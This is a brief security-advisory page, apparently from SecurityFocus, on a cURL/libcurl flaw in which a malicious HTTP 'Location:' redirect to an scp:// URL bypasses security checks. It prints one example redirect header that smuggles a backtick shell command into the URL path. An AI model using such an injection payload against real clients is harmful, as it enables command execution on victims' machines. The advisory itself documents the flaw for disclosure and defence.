cURL/libcURL HTTP 'Location:' Redirect Security Bypass Vulnerability

An attacker may exploit this issue using commonly available tools.

The following example redirection request may be used to carry out this attack:
Location: scp://name:passwd@host/a'``;date >/tmp/test``;'


 

Privacy Statement
Copyright 2010, SecurityFocus